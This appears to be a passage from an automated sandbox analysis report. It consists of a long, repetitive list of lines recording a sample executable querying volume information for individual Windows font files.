Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
